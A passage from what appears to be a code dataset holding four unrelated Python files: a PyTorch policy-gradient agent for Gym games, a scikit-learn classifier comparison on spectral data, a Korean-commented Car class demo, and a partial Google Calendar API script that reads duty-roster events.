batch_future_rewards = map(lambda x: x.view(-1, 1), [batch_actions, batch_rewards, batch_future_rewards])\n\n # 'vanilla', 'future_rewards', 'actor_critic_mc', 'actor_critic_td'\n if self.policy_gradient_method == 'vanilla':\n # loss function\n # L(theta) = -sum( reward(trajectory) - b ) * log(P(a(t)|s(t);theta)) )\n rewards = trajectory.total_rewards - self.reward_bias\n elif self.policy_gradient_method == 'future_rewards':\n # L(theta) = -sum( ( sum(future_rewards(t)) - b ) * log(P(a(t)|s(t);theta)) )\n rewards = batch_future_rewards - self.reward_bias\n elif self.policy_gradient_method == 'actor_critic_mc':\n # Monte carlo based actor critic\n # L(theta) = -sum( ( sum(future_rewards(t)) - V_pi(s(t)) ) * log(P(a(t)|s(t);theta)) )\n state_value = self.value_net(batch_observations)\n rewards = batch_future_rewards - state_value.detach()\n # loss function of value net\n # L = MSE(sum(future_rewards(t)) - V_pi(s(t)))\n loss_value += self.criterion(batch_future_rewards, state_value)\n elif self.policy_gradient_method == 'actor_critic_td':\n # Temporal Difference based actor critic\n # L(theta) = -sum( ( r(t) + V_pi(s(t+1)) - V_pi(s(t)) ) * log(P(a(t)|s(t);theta)) )\n state_value = self.value_net(batch_observations)\n next_state_value = self.value_net(batch_next_observations)\n # if done: next_state_value will be 0????????????\n rewards = batch_rewards + self.gamma * next_state_value.detach() - state_value.detach()\n # loss function of value net\n # L = MSE( r(t) + V_pi(s(t+1)) - V_pi(s(t)) )\n loss_value += self.criterion(batch_rewards + next_state_value, state_value)\n self.debug_rewards.append(rewards)\n\n prob = self.policy_net(batch_observations).gather(1, batch_actions.long())\n log_prob = torch.log(prob)\n loss += -torch.sum(rewards * log_prob)\n if self.need_value_net:\n self.loss_history_value.append(loss_value.item())\n self.optimizer_value.zero_grad()\n loss_value.backward()\n self.optimizer_value.step()\n self.loss_history.append(loss.item())\n self.optimizer_policy.zero_grad()\n loss.backward()\n self.optimizer_policy.step()\n self.num_learns += 1\n\n def save(self, filename = 'policy_net.txt'):\n torch.save(self.policy_net.state_dict(), filename)\n\n def load(self, filename = 'policy_net.txt'):\n self.policy_net.load_state_dict(torch.load(filename))\n\nclass Game(object):\n def __init__(self, game_name):\n self.env = gym.make(game_name)\n #self.env.seed(1)\n print('action space:', 
self.env.action_space)\n        print('observation space:', self.env.observation_space)\n        self.agent = Agent(self.env.observation_space, self.env.action_space)\n        self.reward_shaping = getattr(self, 'reward_shaping_{}'.format(game_name.split('-')[0]))\n        self.resolved = getattr(self, 'resolved_{}'.format(game_name.split('-')[0]))\n\n    def reward_shaping_CartPole(self, observation, next_observation, reward):\n        x, x_dot, theta, theta_dot = next_observation\n        r1 = (self.env.unwrapped.x_threshold - abs(x))/self.env.unwrapped.x_threshold - 0.8\n        r2 = (self.env.unwrapped.theta_threshold_radians - abs(theta))/self.env.unwrapped.theta_threshold_radians - 0.5\n        reward = r1 + r2\n        return reward\n\n    def reward_shaping_MountainCar(self, observation, next_observation, reward):\n        position = observation[0]\n        next_position, next_velocity = next_observation\n        # the higher the better\n        #reward = abs(position - (-0.5)) # r in [0, 1]\n        #if position > -0.2: reward = 1\n        if next_position > position: reward += 1\n        if not hasattr(self, 'max_position'): self.max_position = next_position\n        if next_position > self.max_position:\n            reward += 2\n            self.max_position = next_position\n            print('Max position reached: {}'.format(next_position))\n        return reward\n\n    def resolved_CartPole(self, scores):\n        if len(scores) >= 100 and np.mean(scores[-100:]) >= 195.0:\n            print('Solved after {} episodes'.format(len(scores)-100))\n            return True\n        return False\n\n    def resolved_MountainCar(self, scores):\n        if len(scores) >= 10 and np.mean(scores[-10:]) >= -100.0:\n            print('Solved after {} episodes'.format(len(scores)-10))\n            return True\n        return False\n\n    def run_one_episode(self, optimal = False, render = False):\n        observation = self.env.reset()\n        done = False\n        num_steps = 0\n        shaping_rewards = 0\n        rewards = 0\n        if self.agent.add_timestep_to_observation: observation = np.append(observation, num_steps)\n        while not done:\n            if render: self.env.render()\n            action = self.agent.choose_action(observation, optimal)\n            next_observation, reward, done, _ = self.env.step(action)\n            shaping_reward = reward if not hasattr(self, 'reward_shaping') else self.reward_shaping(observation, next_observation, reward)\n            if self.agent.add_timestep_to_observation: next_observation = np.append(next_observation, num_steps+1)\n            if not optimal: self.agent.memorize(observation, action, next_observation, shaping_reward, done)\n            observation = next_observation\n            num_steps += 1\n            rewards += reward\n            shaping_rewards += shaping_reward\n        return rewards, shaping_rewards, num_steps\n\n    def run(self, episodes, optimal = False, render = False):\n        print('start to run (optimal: {})...'.format(optimal))\n        scores = []\n        shaping_scores = []\n        for episode in range(episodes):\n            self.agent.new_episode()\n            rewards, shaping_rewards, num_steps = self.run_one_episode(optimal, render)\n            print('episode {}: steps {}, rewards: {}, shaping_rewards: {}, num_learns: {}'.format(episode, num_steps, rewards, shaping_rewards, self.agent.num_learns))\n            scores.append(rewards)\n            shaping_scores.append(shaping_rewards)\n            if self.resolved(scores): break\n            #if episode % 10 == 0:\n            #    plt.plot(self.agent.loss_history)\n            #    plt.show()\n            #if episode > 300: optimal = True\n            #if rewards == 200: render = True\n        plt.plot(scores)\n        plt.plot(shaping_scores, 'r--')\n        plt.show()\n        pprint.pprint(self.agent.debug_rewards)\n\n\nif 
__name__ == '__main__':\n #game = Game('CartPole-v0')\n game = Game('MountainCar-v0')\n\n game.run(episodes = 10000)\n game.agent.save()\n #game.agent.load()\n #game.replay_buffer.show()\n #game.run(episodes = 1, optimal = True, render = True)\n game.env.close()\n print('done')\n","sub_path":"policy_gradient.py","file_name":"policy_gradient.py","file_ext":"py","file_size_in_byte":12926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"114042901","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import accuracy_score, r2_score, classification_report\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_selection import SelectKBest, f_classif\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport csv\n\n\n\n#This function takes in a list and a file to write to, writes list to file as a .csv file\ndef writeListToFile(list1, filename):\n with open(filename, 'w') as resultFile:\n wr = csv.writer(resultFile, dialect = 'excel')\n wr.writerow(list1)\n\n\n\n#Reading in the input files for the multiclass classification task\n\ndf_XM = pd.read_csv('multiclass/X.csv', header=None)\ndf_yM = pd.read_csv('multiclass/y.csv', header=None)\ndf_WaveM = pd.read_csv('multiclass/Wavelength.csv', header=None);\n\n#Reading in the input files for the binary classification task\n\ndf_XB = pd.read_csv('binary/binary/X.csv', header=None)\ndf_yB = pd.read_csv('binary/binary/y.csv', header=None)\ndf_WaveB = pd.read_csv('binary/binary/Wavelength.csv', header=None)\n\n#Reading in the input files for the solution classifcation tasks\ndf_FinalXB = pd.read_csv('binary/binary/XToClassify.csv')\ndf_FinalXM = pd.read_csv('multiclass/XtoClassify.csv')\n\nprint(\"Shape of y is: \", df_yB.shape)\n\n#Flattening the data recived from the y files in order to a compatiable shape for training\n\ndf_y_flatB = df_yB.values.flatten()\ndf_y_flatM = df_yM.values.flatten()\n\nprint(\"Shape of y ravel is: \", df_y_flatB)\n\n\n\n\nX_trainB, X_testB, y_trainB, y_testB = train_test_split(df_XB, df_y_flatB, test_size = 0.4, random_state = 30)\n\nX_trainM, X_testM, y_trainM, y_testM = train_test_split(df_XM, df_y_flatM, test_size = 0.4, random_state = 30)\n\n\n\n#Defining the lists that will be written to file, for each different function\n\nfitTimeListBinaryLog = []\npredictTimeListBinaryLog = []\nfitTimeListMultiLog = []\npredictTimeListMultiLog = []\n\nfitTimeListBinaryNN = []\npredictTimeListBinaryNN = []\nfitTimeListMultiNN = []\npredictTimeListMultiNN = []\n\nfitTimeListMultiNNtanh = []\npredictTimeListMultiNNtanh = []\nfitTimeListMultiNNlogistic = []\npredictTimeListMultiNNlogistic = []\nfitTimeListMultiNNidentity = []\npredictTimeListMultiNNidentity = []\n\nfitTimeListMultiNNsgd = []\npredictTimeListMultiNNsgd = []\nfitTimeListMultiNNlbfgs = []\npredictTimeListMultiNNlbfgs = []\n\n\nfitTimeListMultiNNlayers = []\npredictTimeListMultiNNlayers = []\n\nfitTimeListMultiNNFinal = []\npredictTimeListMultiNNFinal = []\n\n#Defining the lists for printing each of the Scores for each function into a csv file.\nbinaryLogScore = []\nmultiLogScore = []\nbinaryNNScore = []\nmultiNNScore = []\nmultiNNtanhScore = []\nmultiNNlogisticScore = []\nmultiNNidentityScore = []\nmultiNNsgdScore = []\nmultiNNlbfgsScore = []\nmultiNNlayers = []\nmultiNNFinal = []\n\n#Defining the variabels to store the average score of each of the functions \naverageBLS = 0\naverageMLS 
= 0\naverageBNS = 0\naverageMNS = 0\naveragetanh = 0\naveragelogistic = 0\naverageidentity = 0\naveragesgd = 0\naveragelbfgs = 0\naveragelayers = 0\naverageFinal = 0\n\n\n\n#This function runs logistic regression on the binary data\ndef binaryLog(X_trainB, X_testB,y_trainB,y_testB,i):\n selectorB = SelectKBest(f_classif, k=i).fit(X_trainB, y_trainB)\n X_bestB = selectorB.transform(X_trainB)\n X_testBestB = selectorB.transform(X_testB)\n\n logreg = LogisticRegression()\n\n fitTime = time.clock()\n logreg.fit(X_bestB, y_trainB)\n fitTimeResult = time.clock() - fitTime\n fitTimeListBinaryLog.append(fitTimeResult)\n print(fitTimeResult)\n\n predictTime = time.clock()\n result = logreg.predict(X_testBestB)\n predictTimeResult = time.clock() - predictTime\n predictTimeListBinaryLog.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(result,y_testB)\n binaryLogScore.append(score)\n print(\"SCORE IS: \", score)\n\n writeListToFile(fitTimeListBinaryLog, \"fitTimeBinaryLog.csv\")\n writeListToFile(predictTimeListBinaryLog, \"predictTimeBinaryLog.csv\")\n writeListToFile(binaryLogScore, \"binaryLogScore.csv\");\n\n return score;\n\n#This function runs logistic regression on the multiclass data\ndef multiLog(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n logregM = LogisticRegression()\n fitTime = time.clock()\n logregM.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiLog.append(fitTimeResult)\n print(fitTimeResult)\n\n predictTime = time.clock()\n resultM = logregM.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiLog.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultM, y_testM)\n multiLogScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiLog, \"fitTimeMultiLog.csv\")\n writeListToFile(predictTimeListMultiLog, \"predictTimeMultiLog.csv\")\n writeListToFile(multiLogScore, \"multiLogScore.csv\")\n\n return score;\n\n#This functions runs a Neural Network on the binary data\ndef binaryNN(X_trainB, X_testB,y_trainB,y_testB,i):\n\n \n selectorB = SelectKBest(f_classif, k=i).fit(X_trainB, y_trainB)\n X_bestB = selectorB.transform(X_trainB)\n X_testBestB = selectorB.transform(X_testB)\n\n clf = MLPClassifier(activation='relu', solver='lbfgs', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n\n fitTime = time.clock()\n clf.fit(X_bestB, y_trainB)\n fitTimeResult = time.clock() - fitTime\n fitTimeListBinaryNN.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNB = clf.predict(X_testBestB)\n predictTimeResult = time.clock() - predictTime\n predictTimeListBinaryNN.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNB, y_testB)\n binaryNNScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListBinaryNN, \"fitTimeBinaryNN.csv\")\n writeListToFile(predictTimeListBinaryNN, \"predictTimeBinaryNN.csv\")\n writeListToFile(binaryNNScore, \"binaryNNScore.csv\")\n\n return score;\n\n\n#This function runs a Nerual Network on the multiclass data\ndef multiNN(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf 
= MLPClassifier(activation='relu', solver='adam', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNN.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNN.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNN, \"fitTimeMultiNN.csv\");\n writeListToFile(predictTimeListMultiNN, \"predictTimeMultiNN.csv\")\n writeListToFile(multiNNScore, \"multiNNScore.csv\");\n\n return score;\n\n\n#This function runs a Neural Network on the multiclass data using the tanh activation function\ndef multitanhNN(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='tanh', solver='adam', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNtanh.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNtanh.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNtanhScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNtanh, \"fitTimeMultiNNtanh.csv\");\n writeListToFile(predictTimeListMultiNNtanh, \"predictTimeMultiNNtanh.csv\")\n writeListToFile(multiNNtanhScore, \"multiNNtanhScore.csv\");\n\n return score\n\n\n#This function runs a Neural Network on the multiclass data using the tanh logistic function\ndef multilogisticNN(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='logistic', solver='adam', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNlogistic.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNlogistic.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNlogisticScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNlogistic, \"fitTimeMultiNNlogistic.csv\");\n writeListToFile(predictTimeListMultiNNlogistic, \"predictTimeMultiNNlogistic.csv\")\n writeListToFile(multiNNlogisticScore, \"multiNNlogisticScore.csv\");\n\n return score\n\n\n#This function runs a Neural Network on the multiclass data using the identity activation function\ndef multiidentityNN(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='identity', solver='adam', 
alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNidentity.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNidentity.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNidentityScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNidentity, \"fitTimeMultiNNidentity.csv\");\n writeListToFile(predictTimeListMultiNNidentity, \"predictTimeMultiNNidentity.csv\")\n writeListToFile(multiNNidentityScore, \"multiNNidentityScore.csv\");\n\n\n return score\n\n#This function runs a Neural Network on the multiclass data using the sgd solver \ndef multisgdNN(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='relu', solver='sgd', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNsgd.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNsgd.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNsgdScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNsgd, \"fitTimeMultiNNsgd.csv\");\n writeListToFile(predictTimeListMultiNNsgd, \"predictTimeMultiNNsgd.csv\")\n writeListToFile(multiNNsgdScore, \"multiNNsgdScore.csv\");\n\n\n return score\n\n#This function runs a Neural Network on the multiclass data using the lbfgs solver\ndef multilbfgsNN(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='relu', solver='lbfgs', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNlbfgs.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNlbfgs.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNlbfgsScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNlbfgs, \"fitTimeMultiNNlbfgs.csv\");\n writeListToFile(predictTimeListMultiNNlbfgs, \"predictTimeMultiNNlbfgs.csv\")\n writeListToFile(multiNNlbfgsScore, \"multiNNlbfgsScore.csv\");\n\n return score\n\n#This function runs a Neural Network on the multiclass data using a higher amount of layers and dpeth of layers\ndef nnLayersCompare(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='relu', solver='adam', alpha=0.0001, 
hidden_layer_sizes=(128,128,128,128), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNlayers.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNlayers.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNlayers.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNlayers, \"fitTimeMultiNNlayers.csv\");\n writeListToFile(predictTimeListMultiNNlayers, \"predictTimeMultiNNlayers.csv\")\n writeListToFile(multiNNlayers, \"multiNNlayersScore.csv\");\n\n return score\n\n\n#This function runs a Neural Network on the multiclass data using the best settings, which were chosen through the results of the above functions\ndef nnFinal(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='tanh', solver='adam', alpha=0.0001, hidden_layer_sizes=(128,128,128,128), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNFinal.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNFinal.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNFinal.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNFinal, \"fitTimeMultiNNFinal.csv\");\n writeListToFile(predictTimeListMultiNNFinal, \"predictTimeMultiNNFinal.csv\")\n writeListToFile(multiNNFinal, \"multiNNFinalScore.csv\");\n\n return score\n\n#This functions prints out to file the final solution to the data provided for the binary class.\ndef binarySolution(X_trainB, df_FinalXB ,y_trainB):\n selectorB = SelectKBest(f_classif, k=1).fit(X_trainB, y_trainB)\n X_bestB = selectorB.transform(X_trainB)\n X_testBestB = selectorB.transform(df_FinalXB)\n\n logreg = LogisticRegression()\n\n logreg.fit(X_bestB, y_trainB)\n \n result = logreg.predict(X_testBestB)\n \n print(result)\n\n writeListToFile(result, \"binaryTask/PredictedClasses.csv\");\n\n#This function prints out to the file the final solution to the data provided for the multiclass.\ndef multiSolution(X_trainM, df_FinalXM ,y_trainM):\n selectorM = SelectKBest(f_classif, k=10).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(df_FinalXM)\n\n logreg = LogisticRegression()\n\n logreg.fit(X_bestM, y_trainM)\n\n result = logreg.predict(X_testBestM)\n \n print(result)\n\n writeListToFile(result, \"multiClassTask/PredictedClasses.csv\");\n\n\n\n\n#Loop running over the main section of the program, i indicates the number of features that function will run on\nfor i in range(1,921):\n print(i) \n # averageBLS += binaryLog(X_trainB, X_testB,y_trainB,y_testB,i)\n # averageMLS += multiLog(X_trainM, X_testM, y_trainM, y_testM,i)\n # averageBNS += binaryNN(X_trainB, X_testB,y_trainB,y_testB,i)\n # averageMNS += multiNN(X_trainM, X_testM, y_trainM, y_testM,i)\n #averagetanh += multitanhNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagelogistic += 
multilogisticNN(X_trainM, X_testM, y_trainM, y_testM,i)\n #averageidentity += multiidentityNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagesgd += multisgdNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagelbfgs += multilbfgsNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagelayers += nnLayersCompare(X_trainM, X_testM, y_trainM, y_testM,i)\n # averageFinal += nnFinal(X_trainM, X_testM, y_trainM, y_testM,i)\n\nbinarySolution(X_trainB, df_FinalXB ,y_trainB)\nmultiSolution(X_trainM, df_FinalXM ,y_trainM)\n\n\n\n#Printing out the average score for each of the functions.\nprint(\"The average score for binaryLog was: \", averageBLS/921)\nprint(\"The average score for multiLog was: \", averageMLS/921)\nprint(\"The average score for the binaryNN was: \", averageBNS/921)\nprint(\"The average score for the multiNN was: \", averageMNS/921)\nprint(\"The average score for the multitanhNN was: \", averagetanh/921)\nprint(\"The average score for the multilogisticNN was: \", averagelogistic/921)\nprint(\"The average score for the multiidentityNN was: \", averageidentity/921)\nprint(\"The average score for the multisgdNN was: \", averagesgd/921)\nprint(\"The average score for the multilbfgsNN was: \", averagelbfgs/921)\nprint(\"The average score for the multiLayers was: \", averagelayers/921)\nprint(\"The average score for the Final NN was: \", averageFinal/921)\n\n\n\n#Plotting of training data visulising the data to show cross overs in validation categories\n\n\n\nfig, ax = plt.subplots()\n\n\n\n\n#for i in range(len(X_trainM)):\n # if y_trainM[i] == 0:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='b')\n # elif y_trainM[i] == 1:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='g')\n # elif y_trainM[i] == 2:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='m')\n # elif y_trainM[i] == 3:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='r')\n # elif y_trainM[i] == 4:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='y')\n\n\nfor i in range(len(X_trainB)):\n if y_trainB[i] == 0:\n ax.scatter(df_WaveB,X_trainB.iloc[i,:], s=1, c='g')\n elif y_trainB[i] == 1:\n ax.scatter(df_WaveM,X_trainB.iloc[i,:], s=1, c='r')\n\n\n\n\n\n\n\nplt.show()\n\n\n\n\n","sub_path":"Machine Learning Classification (2017-2018)/practical2.py","file_name":"practical2.py","file_ext":"py","file_size_in_byte":19615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"592975421","text":"class Car:\n # #인스턴스 변수\n # color = \"\"\n # speed = 0\n car_count = 0\n\n def __init__(self,color,speed):\n self.color = color\n self.speed = speed\n Car.car_count += 1\n\n def __del__(self):\n Car.car_count -= 1\n\n def upSpeed(self, value):\n self.speed += value\n \n def downSpeed(self, value):\n self.speed -= value\n\n#객체 생성\nmyCar1 = Car(\"Red\",30)\n\nmyCar2 = Car(\"Blue\",20)\n\nmyCar3 = Car(\"Black\",50)\n\nmyCar1.upSpeed(20)\nprint(\"자동차1의 색상은 {}이며 현재 속도는 {:3d}km\".format(myCar1.color,myCar1.speed))\nmyCar2.upSpeed(10)\nprint(\"자동차2의 색상은 {}이며 현재 속도는 {:3d}km\".format(myCar2.color,myCar2.speed))\nmyCar3.upSpeed(30)\nprint(\"자동차3의 색상은 {}이며 현재 속도는 {:3d}km\".format(myCar3.color,myCar3.speed))\n\nprint()\nprint(\"myCar1 주소 : \",id(myCar1))\nprint(\"myCar2 주소 : \",id(myCar2))\nprint(\"myCar3 주소 : \",id(myCar3))\n\n\nprint()\nprint(\"생상된 총 자동차 수 : {}\".format(Car.car_count))","sub_path":"class/car4.py","file_name":"car4.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"394339539","text":"import httplib2\nimport datetime\nimport os\nimport googleapiclient.discovery as discovery\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.file import Storage\nfrom oauth2client.tools import run_flow\n\nos.chdir(\"D:/workspace/Google/\")\nCLIENT_SECRET = 'client_secret.json'\nSCOPE = 'https://www.googleapis.com/auth/calendar'\nSTORAGE = Storage('credentials.storage')\nMY_CALENDAR_ID = \"limbc122@gmail.com\"\nSHARE_CALENDAR_ID = \"nisd7q1snk190j67v22uvq43c0@group.calendar.google.com\"\n\n# Start the OAuth flow to retrieve credentials\ndef authorize_credentials():\n # Fetch credentials from storage\n credentials = STORAGE.get()\n\n # If the credentials don't exist in the storage location then run the flow\n if credentials is None or credentials.invalid:\n flow = flow_from_clientsecrets(CLIENT_SECRET, scope=SCOPE)\n http = httplib2.Http()\n credentials = run_flow(flow, STORAGE, http=http)\n return credentials\n\ndef get_calendars(service):\n calendar_list = service.calendarList().list().execute()\n return calendar_list['items']\n\ndef get_calendar(service, calendar_id):\n for calendar in get_calendars(service):\n if calendar.get(\"id\") == calendar_id:\n return calendar\n\ndef get_events(service, calendar_id, start, end):\n eventsResult = service.events().list(\n calendarId=calendar_id,\n timeMin=start,\n timeMax=end,\n timeZone=\"Asia/Seoul\",\n singleEvents=True,\n orderBy='startTime').execute()\n return eventsResult.get('items', [])\n\ndef insert_event(service, calendar_id, event_name, start, end):\n body = {\n 'summary': event_name,\n 'description': event_name,\n 'start': {\n 'date': start,\n 'timeZone': 'Asia/Seoul',\n },\n 'end': {\n 'date': end,\n 'timeZone': 'Asia/Seoul',\n },\n }\n\n return service.events().insert(calendarId=calendar_id, body=body).execute()\n\ndef delete_event(service, calendar_id, event_id):\n return service.events().delete(calendarId=calendar_id, eventId=event_id).execute()\n\n# Connect Google\ncredentials = authorize_credentials()\nhttp = credentials.authorize(httplib2.Http())\nservice = discovery.build('calendar', 'v3', http=http)\nfor calendar in get_calendars(service):\n if calendar.get(\"summary\").strip() == \"2019년 매매데이터팀 당번\": # Korean calendar name: \"2019 trading data team duty roster\"\n SHARE_CALENDAR_ID = calendar.get(\"id\")\n break\n\n# Set date\nKST = datetime.timezone(datetime.timedelta(hours=9))\n# start = datetime.datetime(2019, 6, 1, 0, 0, 0, tzinfo=KST)\n# end = datetime.datetime(2019, 12, 31, 23, 59, 59, tzinfo=KST)\n\nmonths = [datetime.date(2019, m, 1) for m in range(7, 13)]\nfor month in months:\n print(\"< {} >\".format(month.strftime('%B')))\n start = datetime.datetime(month.year, month.month, 1, 0, 0, 0, tzinfo=KST)\n end = start + datetime.timedelta(days=31)\n\n # Get Shared Calendar\n print(\"## Get Shared Calendar\")\n events_share = get_events(service, SHARE_CALENDAR_ID, start.isoformat(), end.isoformat())\n events_share = [ event for event in events_share if \"임병천\" in event.get(\"summary\") ] # keep only events mentioning the owner's name\n\n # Get My Calendar\n print(\"## Get My Calendar\")\n my_events = get_events(service, MY_CALENDAR_ID, start.isoformat(), end.isoformat())\n 